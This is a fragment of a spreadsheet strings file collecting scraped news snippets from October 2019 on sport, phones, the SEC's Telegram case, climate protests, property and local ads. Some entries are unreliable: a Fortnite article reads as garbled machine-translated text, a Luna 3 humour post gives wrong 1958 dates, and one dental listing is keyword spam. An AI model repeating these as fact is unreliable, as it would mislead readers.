    <t>Photo by Harry How/Getty Images All the information needed to watch or listen to the Steelers road game this Sunday night in Los Angeles It’s been a rough start to the 2019 season. Week 6 brings another trip west as the Pittsburgh Steelers travel to Los Angeles on Sunday night to take on Philip Rivers, Joey Bosa, and the rest of the Los Angeles Chargers. Sitting at 1-4, the Steelers could really use a win going into the bye week. Although the Steelers are still non-committal about who will be their starting quarterback, they have a host of other injuries coming into Week 6. Players such as Jaylen Samuels, James Washington, Roosevelt Nix, Mark Barron, and Vance McDonald are either out or in question for Sunday’s game. But the Chargers have plenty of their own injuries with 11 players currently on injured reserve. With the Chargers sitting 2-3 and two games back in the AFC West, both teams need a win in a bad way on Sunday. Can either one of the Steelers’ young quarterbacks get the job done depending on who gets the call? Can the Steelers defense keep generating takeaways and sacks? Or will Philip Rivers find some magic and pull off the win over the Steelers similar to 2018? This Sunday will answer all of these questions as one of these two teams will take a step in getting back into their respective divisional races. Get all the information you need below so you can enjoy the Week 6 showdown: Week 6: Game: Pittsburgh Steelers vs, Los Angeles Chargers Date: Sunday, October 13th Kickoff: 8:20 P.M. ET Venue: ROKiT Field at Dignity Health Sports Park, Carson, CA Weather: Live weather update TV Channel: Broadcast nationally on NBC Sunday Night Football with Al Michaels and Chris Collinsworth as commentators and Michelle Tafoya as the sideline reporter. Check the national broadcast map to see if the game is on in your area. Online: NFL Game Pass offers live games for international viewers and replays of every game during upon conclusion with a paid subscription. NFL Game Center will update the action on a play-by-play basis. The NBC Sports mobile app on Apple or Andriod will carry the game live for anyone who is subscribed to the NBC Sports channel. A login through your TV provider may be required. The game is also scheduled to stream live in some areas on the Yahoo! Sports app. Radio: Steeler Nation Radio with Bill Hillgrove, Tunch Ilkin, and Craig Wolfley. The broadcast will be live on WDVE 102.5 FM and WBGG 970 AM in the Pittsburgh area or check the list of Steelers Radio Affiliates. Viewers can listen anywhere in the world online via Steelers.com, but the Steelers Official Mobile App does have geographical restrictions. You can also follow Behind the Steel Curtain on Twitter or in the game thread article to catch all of the highlights. Be sure to check back with BTSC after the game for our post-match roundup, and subscribe to BTSC Steelers Radio on YouTube to catch The Steelers Post Game Show with Jeff Hartman and Lance Williams.</t>
  </si>
  <si>
    <t>FUEL prices fell by just under a penny last month to record a second consecutive price drop, according to data from RAC Fuel Watch. Price of fuel shrunk despite concerns an overall cost would rise after last month’s Saudi Arabia oil explosion. Daily Express :: Cars Feed</t>
  </si>
  <si>
    <t>Waller would rather win the Melbourne Cup than The Everest, he says. But maybe this year he can claim both...</t>
  </si>
  <si>
    <t>Two months after its launch in India, Oppo has held an event in London for the new generation of its Reno range. In this case, only two new models arrive in Europe: Reno 2 and Reno 2 Z, while Reno 2 F does not. We’ve been lucky to try Oppo Reno 2 before its official launch so here’s our full review. The main difference between the Reno 2 and the original Reno is the rear camera. Now, the module includes four lenses that significantly improve photographic results and bring them closer to those of the Oppo Reno 10x Zoom also launched in April. Price The official presentation in Europe of Oppo Reno 2 took place 16 October, at an event held at the English National Ballet in London. It will be available from 18 October priced from £449 in the UK – that’s £50 cheaper than the original. If you’re looking for something even cheaper, the Reno 2 Z is just £329. Design &amp; Build Before analyzing the performance of Reno 2, you are probably interested in knowing more about its design. At first glance, it does not present too many physical differences with the previous model and retains that curved structure at the rear, as well as at the angles. The dimensions have changed slightly, now with a taller and thicker body than before: 160 x 74.3 x 9.5mm instead of 156.6 x 74.3 x 9mm. That’s because Oppo has made room for a bigger screen and a more powerful battery. Our first feeling was that the Reno 2 is somewhat heavy, but it should be said that you quickly get used to both weight and dimensions, especially if you come from a device with a smaller screen. If you are also one of those who prioritise having a large screen to be able to handle it well with one hand, this experience is even better with the absence of any type of notch or hole in the panel thanks to its moving selfie camera. The Reno 2’s bezel is very small but still visible. Although aesthetically we prefer the design with curved edges of mobiles such as the Galaxy Note 10, we still prefer that there be a bezel because the image on the screen is not interupted. As we have already mentioned, the main difference between the first Reno and this is the rear camera. This also affects the design, since behind we now have four lenses instead of just two. The O-dot is still present to protect the camera. The presence of this raised nubbin does not make the mobile completely flat and it may bother you if you type with your smartphone resting on the table. The Reno 2 will shake a little when writing but at least it will remain stable and will not slip. It is also worth mentioning that it has the same Gorilla Glass 6 on the front and the same Gorilla Glass 5 on the rear as per the original Reno and the Reno 10x Zoom. If you are bothered by the fingerprint marks left by your fingers, you can use the protective case that comes in the box, although its design will not be to everyone’s taste. There is no mention of its water resistance, so we assume it’s not resistant. The Reno 2 arrives in Europe in two colors: Ocean Blue and Luminous Black. In other markets it is also available in Sunset Pink, and we are looking forward to seeing it. The tones are brighter than the Ocean Green and the Jack Black of the previous model. Specs &amp; Features Since Oppo has not surprised us with too many design developments, the most interesting thing here is to see if the small internal improvements such as screen, cameras, processor and battery make a big difference to the original and can compete with current rivals. Screen We have already said that the screen of Oppo Reno 2 is somewhat larger than that of its successor. Specifically, the new Reno has gained just 0.1in on the screen, its panel being 6.5- instead of 6.4in. Also, the aspect ratio is now a very tall 20:9. This is the same AMOLED Full HD+ screen, but now it has a somewhat higher resolution of 2400×1080 pixels at 401ppi. Oppo says it has a brightness of 500 nits, quite similar to our results at 463. We can’t say how the screen looks in broad daylight because our tests have coincided with rainy days. However, we think that in general terms you will not have problems seeing the panel with that brightness level. The colours are vibrant and the images look sharp and with good contrast. Some high quality YouTube videos do not play with the desired quality even at a resolution of 1080p, especially if they are especially dark images. At a much lower price, the screen of this Oppo is much better than the LCD of the iPhone 11. The Reno 2 panel reaches higher levels of brightness and more saturated colors. If this saturation bothers you, though, you can adjust the colors to softer tones. Cameras And so onto the main event since the two rear lenses of the original Reno have multiplied to four. In the first generation, the rear camera configuration consisted of a 48Mp main lens and a 5Mp depth sensor. Now, in addition to the 48Mp lens, it has a wide angle 8Mp camera, a 13Mp telephoto lens and a 2Mp mono sensor. In general, and as you can see in our Flickr gallery below, the results are good, although the weather during our testing didn’t do it any favours. The colours are crisp and true to reality. The camera disappoints when it comes to to 20x magnification. With the optical zoom and even with the hybrid zoom up to x5, the results are decent, but thereafter, with the digital zoom, the photos lose a lot of quality and are quite blurry. If we compare the results obtained with the main lens with and without the night mode activated, the differences are quite remarkable. With the mode activated, the portrayed objects will be much better appreciated, almost as we perceive it with our own eyes. By testing the macro mode, the Reno 2 will be intelligently able to detect what it is that you are portraying. As it happened with the Reno 10x Zoom, we like more the blurry effect that is achieved with this type of photos than with the portrait mode activated. Speaking of portrait mode, in the gallery you can also appreciate the differences between a selfie using this mode and another without using it. The bokeh effect is not too pronounced and the results are more natural. In addition, it manages to handle the hair silhouette well. We have taken these photos with the front retractable camera. This is the same removable system that we have seen in previous Renos in the form of shark wings and with a 16Mp lens. To those who are concerned about the durability of this module, we must say that the automatic closing of the camera when detecting the free fall has always worked for us. In addition, Oppo says they have tested 200,000 times and should last up to 5 years. The new video features are interesting. We especially want to highlight the Ultra Steady mode, which offers fantastic stabilization and it will make it seem like you are using a gimbal. Oppo says its retractable camera is the first to allow video recording with a bokeh effect. It should be said that the blurred background is achieved artificially through software and that the results are not too good (hair is often blurred). Performance &amp; Battery life The Oppo Reno 2 is only available in a single configuration: 8GB of RAM and 256GB of storage. The previous model, on the other hand, was also available with 6/128GB. That’s a nice upgrade, then and the Reno 2 also comes equipped with a new processor. The Qualcomm Snapdragon 730G and the Adreno 618 GPU, which is a step up from the Snapdragon 710 processor. If we look at the performance tests below, we see that Reno 2 surpasses Reno Z, although this was to be expected. On the other hand, it was not possible vs the Qualcomm 855 found in the Reno 10x Zoom. When comparing the Reno 2 with other mid-range smartphones that have recently gone on the market, we see that both the Xiaomi Mi 9 and the OnePlus 7T far exceed the results in Geekbench 4. For practical purposes, the new Oppo device remains a handset with which you can trust if you want to perform from the most basic tasks to more intense ones, although you may suffer a bit with video games rich in graphics. In terms of longevity, the Reno 2 includes a battery with a capacity of 4000mAh, slightly higher than the 3765mAh of the previous generation. In our tests with Geekbench 4, it has given a result of 10 hours and 10 minutes. This translates into hours and hours of real-world usage. The battery of the Reno 2 should easily last throughout the day, even if you regularly use the camera, watch video or play video games. When you have exhausted the battery, you can take advantage of the fast charging of the Reno 2. VOOC Flash Charge 3.0 technology at 20W allows you to recharge it from 0- to 46% in 30 minutes and you can use the phone while charging it without affecting the charge itself. If you’re afraid of running out of battery too early, in addition to having a power bank nearby, you can use the power saving mode. You can set, for example, to save battery provided the phone is idle. Connectivity &amp; Audio For now, 5G connectivity has not reached the mid-range market, so if you want to enjoy higher speeds when using the internet you must continue betting on its Reno 10x Zoom 5G model. The other connectivity services are what we would expect today on any smartphone: Wi-Fi 802.11ac, Bluetooth 5.0, NFC and GPS. You can also unlock by face recognition or fingerprint sensor embedded in the screen and both systems are very fast. Although the charging port is USB-C, the headphone jack port is maintained, something that we’re happy about. Personally, we are getting used to the idea of connecting headphones in the same port as the charging cable. We already complained about this in our review of the Reno 10x Zoom and we see that Oppo has not decided to fix it: the audio comes mainly through the speaker at the bottom. It bothers us particularly and does not help to offer a premium experience at all. Software Another novelty of Reno 2 is the operating system. Bearing in mind that the previous model launched only six months ago, we did not expect Oppo to include a completely new version of its Color OS. Color OS 6.1 comes pre-installed, which is based on Android 9 Pie. The interface has some differences, but usually we do not notice major changes. We quite like the visual design of this software, although it may seem to some that the icons are too small. In any case, you can only make the font and screen size of the apps larger. In general terms it works well, although in some moments we have noticed that it does not respond well to some movements with the finger, such as swiping up and down or pinching with two fingers to zoom. As we saw with Color OS 6, the possibility of controlling Reno 2 with certain gestures is preserved: draw a circle on the locked screen to open the camera or a ‘V’ to activate the flashlight, or also slide three fingers down to capture the screen. If you swipe three fingers up, you will activate the split screen option instead. It is useful for those who want to chat with someone while watching a video on YouTube or other combinations of apps. It is not compatible with certain apps like Instagram, though. Finally, we want to highlight Oppo’s efforts to take care of the health of its users. With Reno 2, you can also control your mobile use with the Digital Wellbeing feature ’or protect your view with Night Protection or Visual Anti-fatigue Mode. Verdict Those who expected many developments with the second generation of Oppo Reno will be disappointed to see that the Reno 2 has few differences with its predecessor, especially physically. It should be said, however, that we are glad that the Chinese company has at least improved the cameras. The Reno 2 quad camera will not leave anyone unhappy, although the hybrid zoom could be better. For an average user, the power of the processor and the graphics card will be enough even to watch Netflix series or play a video game. They will also celebrate not having to charge the battery before the end of the day. The Reno 2 has tough rivals including the Xiaomi Mi 9 and the OnePlus 7T, although they are more expensive. Source link</t>
  </si>
  <si>
    <t>Secure messaging app Telegram has had its cryptocurrency play paused by the United States Securities and Exchange Commission (SEC), alleging the token offering was unregistered. The SEC on Friday filed an emergency action and obtained temporary restraining order against Telegram and a related entity regarding the initial coin offering (ICO). According to the SEC, the token offering has raised more than $1.7 billion of investor funds. The SEC’s complaint says Telegram Group Inc. and its wholly-owned subsidiary TON Issuer Inc. began raising capital in January 2018 to finance the companies’ business, which included the development of the Telegram Open Network (TON) blockchain. TON is a project designed to introduce blockchain-based payments within the Telegram messaging app. Telegram sold approximately 2.9 billion digital “Gram” tokens to 171 initial purchasers, globally, the SEC said. See also: What should you do when your ICO is dead in the water? Flog it on eBay The complaint continues, saying Telegram promised to deliver the Grams to the initial purchasers upon the launch of its blockchain by no later than 31 October 2019, at which time the purchasers and Telegram will be able to “sell billions of Grams into US markets”. It alleges Telegram failed to register its offers and sales of Grams, which are securities — a violation of the registration provisions of the Securities Act of 1933. “Our emergency action today is intended to prevent Telegram from flooding the US markets with digital tokens that we allege were unlawfully sold,” Co-Director of the SEC’s Division of Enforcement Stephanie Avakian said. “We allege that the defendants have failed to provide investors with information regarding Grams and Telegram’s business operations, financial condition, risk factors, and management that the securities laws require.” Avakian’s fellow co-director Steven Peikin said the SEC has repeatedly stated that issuers cannot avoid the federal securities laws just by labelling a product a cryptocurrency or digital token. “Telegram seeks to obtain the benefits of a public offering without complying with the long-established disclosure responsibilities designed to protect the investing public,” he added. Cryptocurrency trading platform Coinbase last month said it was considering the viability of adding Telegram to its platform, alongside 16 other digital assets. Telegram’s potential inclusion may eventually connect the Coinbase platform to TON. The SEC earlier this month reached a civil settlement with blockchain company Block.one relating to an unregistered ICO it undertook in 2017-18. Block.one said it would pay a $24 million fine whilst “neither admitting nor denying the SEC’s findings”. See also: These are the warning signs of a fraudulent ICO Similarly, the commission in June announced it was suing Kik Interactive Inc, alleging the Canada-based chat platform conducted an illegal $100 million securities offering of digital tokens. At the time, the SEC said that Kik sold digital tokens to US investors without registering the ICO — a requirement under US securities laws. The SEC’s action against Telegram follows Facebook’s entry into the cryptocurrency world looking even more unlikely, with Mastercard, Visa, eBay and Stripe all dropping out of the social media giant’s Libra payments network. Facebook announced Libra in June, saying it intended to roll out a digital coin in 2020 that would integrate with Facebook services and provide the asset required for e-commerce transactions on its platform. Several major backers were supporting the project at the outset, with the members to form the Geneva-based Libra Association, a consortium to oversee the cryptocurrency and the development of its underlying blockchain. Other initial members of the consortium included Uber, Lyft, Spotify, Vodafone, Mercado Pago, PayU, and others. SEE ALSO</t>
  </si>
  <si>
    <t>Climate activists take part in a demonstration Monday in London, where police say they’ve arrested dozens of protesters as the Extinction Rebellion group attempts to draw attention to climate change. Alberto Pezzali/AP hide caption toggle caption Alberto Pezzali/AP Climate activists take part in a demonstration Monday in London, where police say they’ve arrested dozens of protesters as the Extinction Rebellion group attempts to draw attention to climate change. Alberto Pezzali/AP In London and Amsterdam, in Sydney and New York, and in other major cities dotting the map in between, demonstrators crammed main arteries and were arrested by the hundreds Monday as they railed against government inaction on climate change. The protests organized by Extinction Rebellion, an international advocacy group founded last year in a small English town, launched what the organization says will be series of events in more than 60 countries across the world. “There is no Plan(et) B. The government doesn’t have one,” the group said in a statement delineating the various nonviolent protests they called for on Monday. “The things we trust in life that we don’t even know we trust, they’re all incredibly fragile. Extreme weather will tell this truth for us unless the Government does it for us first.” In London, where protesters, many clad in white makeup and red costumes, sought to clog the busy roads around Trafalgar Square and government buildings elsewhere, police said they had already made 276 arrests by Monday evening local time. The throngs of demonstrators disrupted traffic and lofted signs sporting Extinction Rebellion’s logo, a simple hourglass set in a circle. A protester gets hauled away by police Monday in London, where the climate change advocacy group Extinction Rebellion has scheduled nonviolent protests chiefly in Europe, North America and Australia over the next fortnight. Ben Stansall/AFP via Getty Images hide caption toggle caption Ben Stansall/AFP via Getty Images A protester gets hauled away by police Monday in London, where the climate change advocacy group Extinction Rebellion has scheduled nonviolent protests chiefly in Europe, North America and Australia over the next fortnight. Ben Stansall/AFP via Getty Images Environmental activists rally for a funeral march in New York City’s financial district, where some protesters splashed Wall Street’s famous Charging Bull with mock blood. Drew Angerer/Getty Images hide caption toggle caption Drew Angerer/Getty Images Environmental activists rally for a funeral march in New York City’s financial district, where some protesters splashed Wall Street’s famous Charging Bull with mock blood. Drew Angerer/Getty Images “Parliament declared a climate and environment emergency in April and we’ve seen absolutely nothing since. So we’re here again, and we’re going to stay here until they actually do something,” Sophie Cowen, an Extinction Rebellion spokesperson, explained to CBS News. Meanwhile in Amsterdam, where protesters gathered outside the Rijksmuseum, national museum of the Netherlands, police said Monday Monday evening that they removed around 270 people under an emergency order from the city’s mayor. Officials say they have arrested about 90 of the protesters, some of whom have already been set free with fines. And in Berlin, protesters set up a small sea of tents outside the German chancellery building — and found themselves arrested in droves, as well. On Wall Street in New York City, protesters held a mock funeral march and splashed the Charging Bull, the huge bronze tourist attraction, with a coat of red paint resembling blood. Above the scene, a protester stood atop the bull waving a flag with the group’s emblem. Many of the demonstrators who splayed out at its hooves, like so many gored victims, also were taken away by police. Two weeks of planned protests began Monday, in NYC and around the world, as part of an “international extinction rebellion.” Protesters here in the city staged a “climate funeral march” near Wall Street. Red paint got on the “Charging Bull” statue. 27 people were arrested. pic.twitter.com/tKm376yt6m — Spectrum News NY1 (@NY1) October 7, 2019 Demonstrations — and in some cases, arrests — have been reported in Sydney, Paris, Madrid, Vienna, among other cities. The protests, which are expected to last about two weeks, mark a revival of the unrest that erupted earlier this year, when Extinction Rebellion led protests in London that resulted in days of traffic disruption and more than 1,000 arrests. Extinction Rebellion supporters wear red costumes as they perform during a road block Monday in Berlin. Christophe Gateau/dpa/AFP via Getty Images hide caption toggle caption Christophe Gateau/dpa/AFP via Getty Images Extinction Rebellion supporters wear red costumes as they perform during a road block Monday in Berlin. Christophe Gateau/dpa/AFP via Getty Images A woman takes part in a demonstration outside a government building Madrid on Monday. A number of protesters there were arrested after several hundred people took part in a sit-in protest blocking traffic. Oscar Del Pozo/AFP via Getty Images hide caption toggle caption Oscar Del Pozo/AFP via Getty Images A woman takes part in a demonstration outside a government building Madrid on Monday. A number of protesters there were arrested after several hundred people took part in a sit-in protest blocking traffic. Oscar Del Pozo/AFP via Getty Images The protests have an urgency derived from decades of scientific studies and a spate of recent research about the accelerating effects of climate change, including warming oceans, plummeting biodiversity and the looming risks of extinction for more than 12 percent of the world’s plant and animal species. At the United Nations’ Climate Action Summit in New York City last month, teenage climate activist Greta Thunberg grabbed headlines with her challenge to world leaders. “You all come to us young people for hope,” she said at the time. “How dare you? You have stolen my dreams and my childhood with your empty words, and yet I’m one of the lucky ones. People are suffering. People are dying. Entire ecosystems are collapsing.” “The situation is extreme,” Extinction Rebellion member Katerina Hasapopoulos recently told Joanna Kakissis for NPR, “and we need to match that with extreme tactics. I actually don’t think we are extreme enough.” The group says it has three principal demands in the U.K. in particular: the declaration of a “climate and ecological emergency,” the reduction of greenhouse gas emissions in the U.K. to net zero by 2025, and the creation of a “citizen’s assembly” to steer the country’s climate policy. Source link</t>
  </si>
  <si>
    <t>The best ride will take today’s $14 million The Everest at Royal Randwick and Josh Parr, on Trekking, is the highest-rating jockey from a learned quarter.</t>
  </si>
  <si>
    <t>submitted by /u/Drone_Better [link] [comments] u/MindScape00 predicted the Apple Card 2 months before it was announced.</t>
  </si>
  <si>
    <t>Adam Scott has a shocker in Las Vegas, but young countryman Jack Trent makes an impressive US PGA Tour debut.</t>
  </si>
  <si>
    <t>Free sanitary products will be available in public buildings across Dundee, as part of the council's commitment to tackling period poverty.</t>
  </si>
  <si>
    <t>Downtown Los Angeles California Credit Repair | (888) 630-5917 Free Credit Repair Counseling call (888) 630-5917 remove bankruptcy, free consumer report, fix bad credit, check your annual Equifax, TransUnion, Experian credit report. Students get cheap rental quote, Avis charges thousands of dollars moreHILLSBOROUGH, Calif. (KGO)... Friday 04 October 2019 01:25 AM UTC-05 Students get cheap rental quote, Avis charges thousands of dollars more HILLSBOROUGH, Calif. (KGO) – Two Bay Area college students, already steeped in debt, rented a car for their last three months of school in Boston. http://dlvr.it/RFTHWJ</t>
  </si>
  <si>
    <t>Heaven on Earth day-home is currently looking for a compassionate, responsible and energetic person for a home-based dayhome located in Sherwood NW Calgary . Qualifications: * Previous experience working with children aged 6 months to 12 years old is an asset * Excellent time management and problem solving skills * Criminal record /vulnerable sector check, .. Read more</t>
  </si>
  <si>
    <t>Roosters playmaker Kirra Dibb will feature for the Prime Minister's XIII against Fiji on Friday before going on to play her first Test against New Zealand at the end of the month.</t>
  </si>
  <si>
    <t>Greg Hickman has watched Tommy Berry grow from a young pest into one of Australia's top jockeys. Now they shoot for The Everest together with Pierata.</t>
  </si>
  <si>
    <t>sbjel1</t>
  </si>
  <si>
    <t>FIRE SALE until Sold Out! As one of the most compact coffee brewers on the market, the Cafflano Kompact has become a favorite of backpackers, minimalists, and frequent travelers. When not in use, the brewer compresses to a mere 61mm x 108mm and weighs just 220g, making it perfect for brewing on the road. The Kompact uses mixes bellows-style and immersion brewing to produce full-flavoured and full-bodied that’s similar to coffee from a french press or the Aeropress. Basic Cafflano Kompact Instructions: Uncompress the brewer. Grind 16g of coffee at a medium setting and place in the Kompact. Add 270g of hot water and attach the airlock cap. Wait 2-3 minutes, then take the airlock cap off. Flip the brewer over onto a mug and press down firmly.</t>
  </si>
  <si>
    <t>NITV next week premieres a second season of foodie show On Country Kitchen in which Indigenous Chef Mark Olive and Derek Nannup tour regions of NSW. A new series with a delicious twist on New South Wales’ produce, characters, culture and adventures. Cultural man and comic, Derek Nannup, is taken on a tour of the region by the one-of-a kind Indigenous Chef Mark ‘The Black Olive’. The Illawarra is where Mark has lived, on and off, for the last three decades. This is his chance to show Derek around and introduce him to everything and everyone the region has to offer, sharing his expertise in the fusion of native herbs with his recipes inspired by the region. Episode One: Mark and Derek take to the NSW region in their vintage car to visit Uncle Noel Butler for a welcome to Yuin country. Snaking south from Ulladulla, they meet Hilary, Jim and Taco the dog on the waters of Bateman’s Bay, where they pick oysters from the ‘underwater paddocks’. At Kangaroo Valley Olives, the boys have to work for their supper of oils and tapenades, and they have a stand up paddle board race at Huskisson with some of the local mob. Cohen Simpson-Brown dives off the rocks and spears a whiting for a late afternoon feed and the Doonooch dance crew put on a spirited traditional performance on the beach. Wednesday, 23 October at 7.30pm on NITV.</t>
  </si>
  <si>
    <t>The architect behind Australia's superannuation system says the goal of 12 per cent contributions by 2025 could threaten Australian workers' chances at a pay rise. Dr Vince FitzGerald helped design the system under the Keating government, and wanted to halve the pace at which employer contributions rise. The super guarantee is scheduled to increase from 9.5 per cent to 10 per cent from July 2021, and continue growing by 0.5 per cent annually over four years. Dr FitzGerald warned the increases come out of take-home pay, and could harm those trying to pay off their mortgages. Image: Getty</t>
  </si>
  <si>
    <t>Investigators will launch another appeal for information to mark the one-year anniversary of the suspicious death of Nicole Cartwright.</t>
  </si>
  <si>
    <t>Afrikada Qatar bilan 2022 ga chiqish arafasida Zimbabve va Somali o'rtasidagi FIFA Jahon kubogini tomosha qiling. FIFA 2022 yilgi Afrika […] The post Zimbabve v Somali – FIFA Jahon chempionati Qatar 2022 ™ yo'llanmasi appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Ireland's foreign minister says deal is "possible this month, maybe this week but we are not there yet". The post Ireland’s Foreign Minister strikes cautiously optimistic note on Brexit appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Yankees right-hander Masahiro Tanaka has been rock-solid in seven postseason starts dating back to 2015, compiling a 5-2 record with a 1.32 ERA and 0.732 WHIP over 41 innings. New York is counting on the Japanese-born hurler to beat Houston Thursday and even the ALCS at two games apiece. Source: Sports Business News</t>
  </si>
  <si>
    <t>try2bhelpful</t>
  </si>
  <si>
    <t>This is a wine made by Innocent Bystander and Giant Steps winery. It is a bit more austere than their Giant Steps Chardonnay but you aren’t paying $40ish a bottle. It is also worth looking at the Mule Cab Sav whilst you are at it. We’ve got the Shiraz, from the Innocent Bystander barrel haul sales in the past, and it is great as well but they don’t have it at Vinomofo at the moment. BTW - If you can get onto the Innocent Bystander barrel haul sales they are worth going to. We got the Giant Steps Syrah for $16 a bottle last time. https://www.vinomofo.com/wines/red-wine/the-mule-cabernet-sa... If you are a new client the VINO gives you $15 off dozen price. This should work for any dozen of their wines. Tasting notes - Think white peach, grapefruit, citrus and a gentle background toastiness for depth</t>
  </si>
  <si>
    <t>Fortnite has finished. The entire card has been sucked into a black hole, and the game is now stopped while we wait to see what Epic is holding. The end itself was a doozy and, next to all the players in the game, it drew millions of viewers on various streaming platforms – and killed Twitch en route. The event began when the countdown of the map reached zero. The rocket under the counter flew away and disappeared into a portal, while many other gates opened in the sky. The rocket returned, then split into several copies, zooming in the sky and through the portals. Eventually, all the rockets converged to create a new portal to intercept the meteor. Then, the rockets and the meteor returned to the sky and crashed directly in the center of the map, creating a black hole that sucked everything. Eventually, the game went on a black screen with a circle in the middle, surrounded by an astral cloud. From there, your only option is to leave the game. We expect Fortnite to come back after the timeout and get started in Chapter 2. For now, you can watch the circle in the live stream below. (Or rewind the video to watch the event.) You could even see the effects if you were sitting on the menu. Those who missed the event were still hit in the lobby. (video of @ LordSpinkingham) pic.twitter.com/pVwo8UabgH – Fortnite News (@FortniteBR) October 13, 2019 The end drew more than six million simultaneous viewers on YouTube and Twitch, as noted by Rod Breslau on Twitter. Twitch provided "only about" 1.5 million viewers, but there was still enough time to pause the service, and even the Microsoft mixing platform was affected in the same way. As we have already said, Fortnite is dead, long live Fortnite Chapter 2. In anticipation of what would have been the release date of Fortnite season 11, Epic clearly describes this project as a major revival of the unthinkably popular royal battle. I will soon see exactly what the game has in reserve. INFO Buy now</t>
  </si>
  <si>
    <t>The Sydney high school teacher hopes her Fijian principal doesn't come down hard on her on Monday after she bagged three tries for the PM's XIII.</t>
  </si>
  <si>
    <t>Team Advantage</t>
  </si>
  <si>
    <t>• 1253 sqft , 3 bath , 5 bdrm bi-level – FOR SALE CAD350,000 . MLS® SC0180752 in West End, Brooks FANTASTIC LOCATION IN DESIRED PRAIRIE MEADOWS… You will love this home from the moment you walk through the front door into the large entry way. You are sure to enjoy the layout of this home starting with the lovely living room with updated flooring and newer windows throughout the home. Plenty of room to entertain family friends in the formal dining room complete with hardwood floor. Lots of room for the chef to work in the lovely kitchen. Just outside your back door you will really enjoy the summer evenings on your oversized south facing deck. Back inside you will find three good Size bedrooms on the main floor including master suite with a three piece ensuite washroom. Downstairs is complete with two more large bedrooms and large family room and complete three piece washroom and Laundry room. Lets not forget the large corner lot with fully fenced back yard to keep the kids or pets safe and sound. Book your showing Today!! Property information The post Bi-Level For Sale in West End, Brooks appeared first on Point2 Blog.</t>
  </si>
  <si>
    <t>Kid Friendly Dental Clinic In Medicine Hat Alberta Tips to finding Medicine Hat AB dentists Get to know your dentist: The best way to find a new dentist in Medicine Hat AB is to get to know them personally before you require dental care – we are talking about someone who spends a lot of time. River Dental – 378 1 St SE Tips to finding Medicine Hat AB dentists Get to know your dentist: The best way to find a new dentist in Medicine Hat AB is to get to know them personally before you require dental care – we are talking about someone who spends a lot of time. City of Calgary plans a major upgrade to McMahon Stadium’s baseball arena, forcing a potential end to the fabled Foothills. At Park Meadows Dental in Medicine Hat, Alberta we help you get a beautiful smile that turns heads. Emergencies are seen same day. All services provided under one roof. If you have a dental phobia, we can provide sedation options or laughing. The Best 10 Dentists in Medicine Hat, AB Showing 1-10 of 23 Medicine Hat Health &amp; Medical Dentists. Dr Whitzke is the most knowledgable dentist in Medicine Hat! We had terrible experiences at other offices in the city. He is friendly and. The Best Dentists in Medicine Hat Handpicked Top 3 Dentists in Medicine Hat, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to. Friendliest Dentist In Medicine Hat Alberta Highest Rated Dentist Near Medicine Hat Alberta Friendliest Dentist Near Medicine Hat The event was held at the Faculty of Dentistry. Unit (MVRU), Faculty of Tropical Medicine, Mahidol University. There are. Medicine Hat, AB Dentist, Vista Dental provides Dental Implants, Tooth Extractions, Root Canals, Wisdom Teeth Treatment, and Sedation Dentistry. Call us today! (403) 548-7077 Penner: Bring on the southern Alberta bucket list – Then, near the end of the two. there are quite a few other Alberta adventures that you could easily put on your “list.”. Council hears details of organics recycling program – Council heard the first details on what the organics program would cost, how it would operate and what impact it might have on extending the life of the city’s landfill if eventually adopted as a. Medicine Hat Dentists at Courtyard Dental Centre are dedicated to family dentistry such as Exams, Teeth Whitening, Veneers and more. We are looking forward to your visit to our Medicine Hat, Alberta dental office. Site Developed by ProSites.com. Crestwood Dental – Your Medicine Hat Dentists At Crestwood Dental Clinic, we understand the struggle associated with trying to find a dentist office that accommodates not only children, but teens, seniors, and the rest of your family. The signs on the edge of Medicine Hat welcome visitors to “The Gas City,” a reference. with a median age four years.</t>
  </si>
  <si>
    <t>Kate McKenna</t>
  </si>
  <si>
    <t>A father-of-two is sentenced to eight years in jail for luring a seven-year-old girl from the toy aisle of a shopping centre north of Brisbane, and molesting her in bushland 30 minutes away.</t>
  </si>
  <si>
    <t>Luna 3 faxed this and other images back. On October 4, 1958, the USSR launched Luna 3, which, as you can tell by its name, was a lunar probe. It did something that had never been done, which shouldn’t be surprising, because in 1958, not a lot of things had been done in space. Luna 3 passed behind the moon and was the first space probe to use gravity assist to change its path and arrive at another planet. Of course, that planet was Earth, but still, a pretty impressive feat. But that isn’t what Luna 3 was known for. Rather, it was the photos of the dark side of the moon that it took on October 7, 1958, 61 years ago. The photos weren’t that great, but still took 10 days to transmit because they had really slow WiFi or something. They didn’t even have dial-up. But, it gave us the first look of the back of the moon, something that only 24 men have seen with their own eyes. All U. S. astronauts, of course. But it wasn’t U.S. eyes that say the far side first. It was Russians. I blame Donald Trump. 0 0</t>
  </si>
  <si>
    <t>Amazon US link. Highly rated ebook (4.5 stars from over 500 reviews). That's what this guide is all about; making the most of your digital camera, so that you can create beautiful photographs. You won't find all the complicated technical jargon that fills other books and blogs. I was like you at one point - I was just a guy who had no clue how to use all the fancy features of my new digital camera, and it was an extremely frustrating experience. My pictures were awful, and I was starting to question why I spent so much money on a DSLR.</t>
  </si>
  <si>
    <t>Amy Schumer, Jessica Simpson joke about post-baby weight loss Original Source Amy Schumer, Jessica Simpson joke about post-baby weight loss … supporting her fellow mom and saying women should lose weight at their own … #mc_embed_signupbackground:#fff; clear:left; font:14px Helvetica,Arial,sans-serif; /* Add your own Mailchimp form style overrides in your site stylesheet or in this style block. We recommend moving this block and the preceding CSS link to the HEAD of your HTML file. */ Subscribe To Sky-News * indicates required Email Address * (function($) window.fnames = new Array(); window.ftypes = new Array();fnames[0]=’EMAIL’;ftypes[0]=’email’;(jQuery));var $mcj = jQuery.noConflict(true); Follow us on Twitter The post Amy Schumer, Jessica Simpson joke about post-baby weight loss appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>The brand enlists three entrepreneurs, including Toronto Raptor Fred Vanvleet, to show the value of its Business Edge card. Read More</t>
  </si>
  <si>
    <t>The British government says the U.K. will leave on Oct. 31 with or without a divorce deal, and is taking steps to minimize the pain of a no-deal exit.</t>
  </si>
  <si>
    <t>The one-time Sizzler staffer will showcase his talents at the city's bug and oyster trail on Sunday.</t>
  </si>
  <si>
